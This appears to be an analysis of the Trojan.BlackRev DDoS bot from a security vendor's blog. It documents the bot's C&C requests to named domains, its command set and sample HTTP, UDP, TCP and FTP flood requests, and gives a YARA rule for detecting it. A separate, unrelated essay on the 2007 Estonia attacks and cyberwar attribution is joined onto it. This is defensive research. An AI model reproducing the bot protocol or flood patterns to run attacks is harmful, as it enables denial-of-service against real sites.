The programming language used is Delphi (networking support via the Synapse library), PEiD detects it as version “6.0 – 7.0″ and the Interactive Delphi Reconstructor (IDR) confirms version 7.

As an aside, the latter tool’s IDC Generator helped significantly in reverse engineering these binaries in IDA Pro, thanks much!

Based on the Delphi usage, command and control locations, and the language references in some of the HTTP headers, the nationality of this family is empirically Russian. But, as with all malware attribution, this is highly speculative. It is also unclear whether a single threat actor has access to the source code or whether the code has been released or leaked and multiple actors are making modifications.

Revision 1

Revision 1′s command and control (C&C) is HTTP based. Bots register to the C&C using a request like this:

GET /113/bot/gate.php?reg=lemaaapuzg HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The reg parameter value is set to 10 random lowercase letters.

Here is how bots poll for commands:

GET /113/bot/gate.php?cmd=urls HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C will respond with a “|” delimited message:

command|unknown_integer|unknown_integer2|target|query string or port|

Identified commands:

• stop – stop attack
• die – terminate bot process
• sleep – sleep for one hour
• http – HTTP GET request flood #1
• simple – HTTP GET request flood #2
• loginpost – HTTP POST request flood #1
• datapost – HTTP POST request flood #2

The following DDoS attacks are implemented in this revision.

Attack – http

A HTTP GET request flood. Here is a sample request:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset:\twindows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie:\tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4;

__utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

The Keep-Alive header will be set to a random integer between 0 and 300. The rest of the headers are static.

Attack – simple

A barebones HTTP GET request flood. It uses Synapse’s default GET request and looks like this:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – loginpost

A HTTP POST request flood. The POST request will look like:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 25

login=gxt1$pass=svw3re1aq

The login and pass parameters are separated by the “$”. Both values are set to random lowercase letters and digits. The lengths will be chosen randomly between 0 and 15 characters each.

Attack – datapost

A HTTP POST request flood. A sample request:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 895

r8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsj

For the POST data, a string of lowercase letters and digits is generated. The length will be randomly chosen between 0 and 150. This string will then be repeated 179 times.

Revision 2

Revision 2 of Trojan.BlackRev modifies the C&C communications slightly. The reg parameter is set to 15 random lower and uppercase letters and it uses the following User-Agent:

User-Agent: Mozilla/4.0 (SEObot)

The following layer 4 attack commands were added:

• syn – TCP connection flood
• udp – UDP flood #1
• udpdata – UDP flood #2
• data – TCP flood
• icmp – ICMP echo request floods

This revision implements revision 1′s http, simple, loginpost, and datapost attacks with the only difference being that in the latter three, the User-Agent used is:

User-Agent: Mozilla/4.0 (SEObot)

The following are the details of the additional DDoS attacks.

Attack – syn

Per the name, this is supposed to be a TCP SYN flood, but behind the scenes, a TCP connection flood is implemented–complete 3-way handshake.

Attack – udp

A UDP flood where the payload is 16 “F”s.

Attack – udpdata

A UDP flood where the payload is 100 random lowercase letters.

Attack – data 

A TCP flood. For the payload, a string of random lowercase letters with a random length of 0 to 100 is generated. This string is repeated 172 times. The concatenated string is then repeated again 35 times.

Attack – icmp

An ICMP echo request or Ping flood. The payload is 44 “7″s.

Revision 2.5

C&C-wise, revision 2.5 is very similar to revision 2. It changes the following commands:

• http
• udp
• udpdata
• data

This revision adds:

• tcpdata – TCP flood #1
• dataget – HTTP GET request flood
• connect – TCP flood #2
• dns – resolve IPs

Attack – http

Example request:

GET /index1.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 176
Connection: keep-alive
User-Agent: Android-x86-1.6-r2 - Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: https://www.google.ru/#hl=ru&gs_rn=9&gs_ri=psy-
ab&tok=TBFEIC6g9ZD8TLHI_O_qEw&cp=5&gs_id=i&xhr=t&q=www.victim1.com&es_nrs=true&pf=p&newwindow=1
&safe=off&output=search&sclient=psy-
ab&oq=site.&gs_l=&pbx=1&bav=on.2,or.r_cp.r_qf.&bvm=bv.45175338,d.bGE&fp=364d6440e7471a0b&biw=
1360&bih=624
Cookie: PHPSESSID=66lf4vv9l8W7engCw6hFmLWShuKAMMuqJICAxiLekLrmAnnmiJ

The Keep-Alive header will be set to a random number between 0 and 300. The Cookie header will be set to “PHPSESSID=” with a value of 50 random uppercase, lowercase, and digits. This revision selects a random User-Agent out of the following 11 possible:

• Yandex/1.01.001 (compatible; Win16; I)
• Yandex/1.01.001 (compatible; Win16; P)
• Yandex/1.02.000 (compatible; Win16; F)
• Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
• Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
• StackRambler/2.0 (MSIE incompatible)
• StackRambler/2.0
• Android-x86-1.6-r2 – Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
• Samsung Galaxy S – Mozilla/5.0 (Linux; U; Android 2.1-update1; ru-ru; GT-I9000 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko)
• Samsung Galaxy Tab 10.1 Android 3.1 – Mozilla/5.0 (Linux; U; Android 3.1; en-us; GT-P7510 Build/HMJ37) AppleWebKit/534.13 (KHTML, like Gecko)
• Blackberry OS ?? 4.2 ?? 5 ?????? ? BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179

The rest of the headers are static, including the very specific Referer.

Attack – udp

The UDP payload is interesting. It is 76 bytes in length, and looks like tcpdump output:

[udp sum ok] 60865 FormErr% [0q] 0/0/0 (12) (DF) (ttl 253, id 9987, len 40)

ASERT team member Matt Bing speculated that it might have been copied and pasted from the tcpdump output in this 2005 article on “Understanding the UDP Protocol”

Attack – udpdata

The payload in this variant is 342 “F”s.

Attack – tcpdata

This is a new attack, a TCP flood. The payload is generated like this: a string of 100 random lowercase letters is generated. This string is repeated 172 times. Then, the concatenated string is repeated 35 times.

Attack – data 

The data command was changed to launch both the udpdata and tcpdata attacks.

Attack – dns 

Repeatedly tries to resolve the target IP via gethostbyaddr() function calls.

Attack – dataget 

A new HTTP GET request flood. Example request:

GET /index10.html?
xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u17k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27
jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd005s5hpwerv1=xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u1
7k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd00

5s5hpwerv1$....more of the same... HTTP/1.1
Host: www.victim10.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (SEObot)

The query string is quite long; it is constructed like this: a string of 150 random lowercase letters and digits is generated. This string is used for 18 name/value pairs. At the end, an additional name/value pairs is added where the values is the random string repeated 53 times. Each name/value pair is separated by a “$”.

Attack – connect 

A new attack, a TCP flood. On each send() iteration a string of 10 random lowercase letters is generated and appended to the previously generated string. A newline is concatenated to the end.

Revision 3

Revision 3 changes things up a bit. The analyzed binary phones home to the same C&C domain and IP as revision 2, but bot registration now looks like this:

GET /ddd/gate.php?id=idbucwehjhhgjjxxe HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The id parameter will be set to “id” plus 15 random lowercase letters.

Commands in this revision are polled via:

GET /ddd/get HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C response is still pipe delimited, but different:

command|number_of_packets_to_send|URL, IP, hostname, or stop

There are some deletions, additions, and changes to the command set.

Commands removed:

• die
• sleep
• syn
• udpdata
• tcpdata
• data
• dataget
• connect

Commands added:

• exec – download and execute
• resolve – hostname resolution flood
• antiddos – HTTP GET request flood — favicon.ico
• range – HTTP GET request flood — Range header
• ftp – FTP connection flood
• download – HTTP GET request flood
• fastddos – HTTP GET request flood — WinInet functions
• slowhttp – HTTP GET request flood — possible Slowloris attempt
• allhttp – launches multiple HTTP floods
• full – launches multiple floods

Commands changed:

• http
• simple
• loginpost
• datapost
• udp

Commands that stayed the same:

• icmp
• dns

Below are revision 3′s attacks.

Attack – http

The http attack changed. It is now a HTTP GET and POST flood. The GET request:

GET /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html

And the POST:

POST /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html
Content-Length: 87664

In both, the Keep-Alive header will be set to a random number between 0 and 300. In the POST, the Content-Length header is set to a random number between 0 and 300,000

Attack – simple

The simple attack is slightly different:

GET /index.html HTTP/1.1
Host: www.victim2.com
Connection: close
User-Agent: Opera/9.80

The User-Agent header looks to be a copy and paste typo. This User-Agent is used in some additional attacks as well.

Attack – loginpost

In addition to the below POST request, a simple flood is also started.

POST /index.html HTTP/1.1
Host: www.victim3.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 28

login=g84lkvpk&pass=uOjzq9FJ

Slight differences: the parameters are separated by a “&” instead of a “$” and the values are each set to eight random lowercase letters and digits.

Attack – datapost

A POST request where the data is 100 random lowercase letters.

POST /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 100

bulwmxcytltvczbrgqoedffycczkyedrmoczlkhgjghmwdnveinkkzgncvtojsxhlchddzebspuwcsdeydalowdcewdxrllgzvvt

Attack – udp

The UDP flood routine no longer uses the Synapse Library in this revision. Winsock is used instead. Port 80 is hardcoded and the payload is only two “F”s.

Attack – resolve

Repeatedly tries to resolve the target hostname via gethostbyname() function calls.

Attack – antiddos 

A HTTP GET request flood. Two requests are sent on each iteration, the first one being:

GET /index.html HTTP/1.1
Host: www.victim2.com
Keep-Alive: 150
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The second:

GET /index.html/favicon.ico HTTP/1.1
Host: www.victim2.com
Keep-Alive: 47
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto3e45h4rlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The Keep-Alive header is set to a random number between 0 and 300. favicon.ico is automatically added in the second request.

Attack – range

A HTTP GET request flood with a Range header. Possibly an attempt at an ARME/Apache Killer style attack. Sample request:

GET /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
Range: bytes=41-73915
User-Agent: Opera/9.80

The Range start value is a random value between 0 and 100. The stop value is a random value between 0 and 100,000.

Attack – ftp

A FTP connection flood. A sample session:

200 OK
USER 7g6jo5ircx
331 password
PASS s1pvu9yx0r
200 OK
TYPE I
200 OK
STRU F
200 OK
MODE S
200 OK
REST 0
200 OK

The USER and PASS will both be set to 10 random lowercase letters and digits. 

Attack – download

A basic HTTP GET request flood:

GET /1.exe HTTP/1.0
Host: www.victim7.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – fastddos

A HTTP GET request flood using the WinInet functions:

GET /index.html HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: google
Host: www.victim8.com
Cache-Control: no-cache

Notice the interesting User-Agent.

Attack – slowhttp

A HTTP GET request flood. Possibly an attempt at a Slowloris attack, but it is not slow at sending data. Here’s what the request looks like:

GET /9.html HTTP/1.0
Host: www.victim9.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)‘=

Attack – allhttp

Launches the following attacks:

• simple
• http
• range
• loginpost
• download
• datapost

Attack – full

Launches the following attacks:

• icmp
• udp
• datapost

Miscellaneous

Besides the C&C and DDoS attacks there are some additional differences and features among the revisions:

• All four revisions spawn a thread that tries to maintain a small memory footprint via calls to SetProcessWorkingSetSize().
• Revisions 1 and 2.x try to revoke discretionary access control list (DACL) rights to its binary.
• Revisions 1 and 2.x enumerate a bunch of directories and then removes files and kills processes based on some tests. The referenced analysis below indicates this might be “botkiller” code.
• Revision 2.x verifies the embedded C&C by calculating a hash on the URL and comparing it to a hardcoded hash value.
• Revision 2.x has some built-in monitoring/debugging functionality where the attack commands are echoed back to the C&C via a HTTP GET request to monitor.php.
• Revision 3 was the first binary to be packed–UPX.
• Revision 3 maintains persistence via the Registry Run method.
• The code organization and layout of revision 3 also differs a bit from the other three.

Most of these code paths were glossed over during reversing and a detailed analysis of them are left as an exercise for any interested readers. There is a Russian language malware analysis of revision 2 by the “onthar.in Malware Research Laboratory” that takes a closer look at some of the above and also at an associated dropper malware. It is available at http://onthar.in/articles/black-revolution-ddos-bot-analysis/ (Google Translate does an okay job.)

ASERT has been using the following YARA rule to detect this malware family in our malware zoo:

// blackrev

// Dennis Schwarz, Arbor Networks ASERT
// April 2013

rule blackrev
{
strings:
$base1 = "http"
$base2 = "simple"
$base3 = "loginpost"
$base4 = "datapost"

$opt1 = "blackrev"
$opt2 = "stop"
$opt3 = "die"
$opt4 = "sleep"
$opt5 = "syn"
$opt6 = "udp"
$opt7 = "udpdata"
$opt8 = "icmp"
$opt9 = "antiddos"
$opt10 = "range"
$opt11 = "fastddos"
$opt12 = "slowhttp"
$opt13 = "allhttp"
$opt14 = "tcpdata"
$opt15 = "dataget"

condition:
all of ($base*) and 5 of ($opt*)
}

Conclusion

As we have seen, Trojan.BlackRev is very much a DDoS-specific bot with a rich set of attacks. There are certainly signs that circa April 2013 the code was under active development and the associated campaigns were likely test runs. In addition, the onthar.in analysis notes that they haven’t seen this malware being sold on the underground forums yet. It will be interesting to see how this family will evolve and how active it will become in the wild.

Background

In April 2007, the Estonian government decided to relocate the Bronze Warrior, a Soviet World War II memorial located in Tallinn, as well as the remains of some Soviet WWII soldiers buried nearby.

This decision caused great offense in Russia, starting at the top. Russian president Vladimir Putin said, “I find that this is an absolutely short-sighted policy, extremist-nationalist, which does not take into consideration the history connected with the fight against Nazism or today’s reality.”

Russia’s foreign minister Sergei Lavrov said Estonia had a “blasphemous attitude towards the memory of those who struggled against fascism.”

Within weeks, the country of Estonia was offline, taken down by a botnet-fueled distributed denial of service (DDoS) attack. This attack impacted both the government and the private sector.

The attacks begin….

Within days of the Estonian government decision, a series of sustained DDoS attacks against Estonian Web properties began.

Estonia’s defense minister at the time, Jaak Aaviksoo, told Wired Magazine:

“The attacks were aimed at the essential electronic infrastructure of the Republic of Estonia,” Aaviksoo tells me later. “All major commercial banks, telcos, media outlets, and name servers — the phone books of the Internet — felt the impact, and this affected the majority of the Estonian population. This was the first time that a botnet threatened the national security of an entire nation.”

Two weeks into the attack, Arbor Networks senior security researcher at that time Jose Nazario posted a detailed analysis on our blog, writing,

“All in all, someone is very, very deliberate in putting the hurt on Estonia, and this kind of thing is only going to get more severe in the coming years.”

Within the first two weeks, our Internet-wide threat monitoring system, ATLAS, saw at least 128 separate attacks on nine different Web sites in the country, including 35 attacks against the Estonian police, another 35 attacks against the Ministry of Finance and 36 against the Estonian parliament, Prime Minister as well as other general government Web properties.

• Attack bandwidths ranged from under 10 Mbps to 95 Mbps, with the majority in the 10-30 Mbps range
• 75 percent lasted no longer than one hour and 5.5 percent, over 10 hours

So does the speculation….

A high profile disagreement between leaders of Estonia and Russia, followed immediately by a cyber-attack against Estonian Web sites? Well, that can only mean one thing, CYBERWAR!!!

Headlines from May 2007:

Estonia: Ground Zero for World’s First Cyber War?

Estonia hit by ‘Moscow cyber war’

Russia accused of unleashing cyberwar to disable Estonia

Slippery Slopes: Attribution and Semantics

One thing that certainly has not changed since the Estonia incident is that hurried analysis, and attempts at instant attribution, are very rarely accurate.

While the headlines said “cyberwar,” the data that we saw at the time said something else, and that is digital attribution regardless of motive can be extremely difficult. These attacks, like many before and since, were widely distributed around the world. In fact, many of the attacks originated from the United States and elsewhere. There was significant chatter and sharing of attack tools on Russian language Web sites.

Arbor’s ATLAS system and subsequent analysis showed signs of Russian nationalism at work, but no Russian government connection. The sources we analyzed from around the world did not show a clear line from Moscow to Tallinn; instead, it was from everywhere around the world to Estonia. Additionally, we noted at the time that targets were high-profile Web properties, not critical national infrastructure.

As so often happens, after the flurry of initial speculation, the facts settle and the truth comes out, and usually with more than a little snark.

Estonia ‘Cyberwar’ Wasn’t

Sadly, this dashes THREAT LEVEL’s hopes of seeing our own made up infowar term on a CNN graphic.  Since we put it out a week ago, a few more hyperbolic cyberterror gems have surfaced in the coverage of the Estonia packet floods — The First War in Cyberspace!, The Future Of Warfare! (exclamation points added) — but the only writer to adopt our Cybarmageddon! was Bruce Sterling.  We’ll let you know if it turns up in his next novel.

There is also a lot of confusion around the term “cyberwar.” What does that mean exactly? One country attacking another seems obvious, but in what respects, what targets, and to what degree? What about when a country leverages experts in the field, as it would with defense contractors, to develop tools and capabilities? Just as there is collaboration between the government and the private sector to develop traditional defense systems and hardware, we must by now realize that the same type of public-private collaboration is happening around the world with regard to cyber capabilities, both defensive and offensive.

I’ll leave the question of what defines a “cyberwar” for others with more patience than I to wax intellectual. What I do know is that geopolitics absolutely shapes the threat landscape and the Internet as we know it today.

Regardless of terminology, we have seen some high profile stories since Estonia. Here are but a few examples that we know about:

April 27, 2007: Attacks on Estonia begin

Week of June 15, 2008: Ukraine put under DDoS attack due to NATO protests

August 5, 2008, three days before Georgia launched its invasion of South Ossetia, the Web sites for OSInform News Agency and OSRadio were hacked. Arbor estimates these attacks were in the 814 Mbps range, significantly (at that time) larger than the Estonian DDoS attacks the year before. (more details can be found in this blog post)

December, 2008 – January, 2009: Israel launched an attack named Operation Cast Lead against the Palestine National Authority. The fighting between the Israeli Defense Forces and Hamas included cyber-attacks against government Web sites and media outlets and involved both State and Non-State actors.

December, 2009 – April, 2010: In the months of unrest leading up to Kyrgyzstan’s second Tulip revolution, the technical unit of Kyrgyzstan intelligence cracked the email account of Gennady Pavlyuk, a leading dissident journalist, to obtain specific data on a project of his, then lured him to Kazakhstan under the pretense of meeting angel investors and killed him.

June 2010: Iran was the victim of a cyber attack when its nuclear facility in Natanz was infiltrated by the now very well-known cyber-worm ‘Stuxnet’.

November 2, 2010: Burma was the victim of a cyber-attack caused by a rapidly escalating, large-scale DDoS  attack targeting Burma’s main Internet provider, the Ministry of Post and Telecommunication (MPT), disrupting most network traffic in and out of the country.

January 2011: Tunisia’s Jasmine Revolution which resulted in the overthrow of a corrupt government, included violent protests and the hacking of user names and passwords for the entire online population of Tunisia by AMMAR, the country’s government-run Internet Services Provider (ISP).

January-February 2011: Egypt and Libya are taken offline entirely by their governments.

June 2011: Chinese and Vietnamese attackers started a cyber war over the territorial dispute on the ownership of the Spratly Islands in the South China Sea. 200 Vietnamese Web sites were attacked in June, and 10 percent of those Web sites were managed by government agencies; the attack disabled all the links on these Web sites and placed China’s flag at the center of the page.

March 20, 2013: S. Korean is targeted by N. Korea in series of cyberattacks and impacting 48,000 computers and servers, hampering banks for two to five days.

April 21, 2013: The U.S. military is increasing its budget for cyber warfare and expanding its offensive capabilities, including the ability to blind an enemy’s radar or shut down its command systems in the event of war, according to two defense officials.

May 2013: A new wave of attacked targeting U.S. energy companies begins, rumored to be driven out of the Middle East. Unlike typical cyberattacks that attempt to obtain confidential information, steal trade secrets and gain competitive advantage, these new attacks seek to destroy data or to manipulate industrial machinery and take over or shut down the networks that deliver energy or run industrial processes.

Again, I’ll leave it to others to debate the semantics of cyberwar. What I do know is that cyberspace is a legitimate battle space. The ongoing attacks against global financial services firms are a great example of how this impacts our business and day-to-day lives. Those attacks have been sustained for over six months, with no end in sight. They are being funded at some level, by someone or some group with very serious motivation that would be difficult to keep going with what we know of traditional hacktivism. We can speculate all day long about who might be behind these attacks but I’d suggest we leave that to others and focus on learning lessons and building better defenses. In this changing geo-political driven environment, understanding the ‘who’ can be near impossible with only digital attribution, but attempting to understand the potential motivation behind attacks can help to better gauge risk to your organization. What has really changed since Estonia? The fact that this type of attack today wouldn’t be nearly as surprising as it was in 2007.

Today, Syria is once again in the dark, as highlighted by the following ATLAS data below.

We’re keeping an eye on the situation in Syria and will update this post with new information if and when it becomes available.

*****Updated: as of 1:45pm ET on May 15, 2013 — ATLAS now shows Syria is back online:

You can clearly see the traffic we are tracking for Syria drop to virtually 0 at 2000 UTC on the graph.  This will be approximately 1 hour after the drop happened in the ‘real’ world given that ATLAS participants only report hourly.

We’ve seen entire countries in the Mideast taken offline before. Here is a look back to January-February 2011 and Egypt,

Watch below, or visit IT ProPortal for a complete video overview of Infosecurity Europe 2013.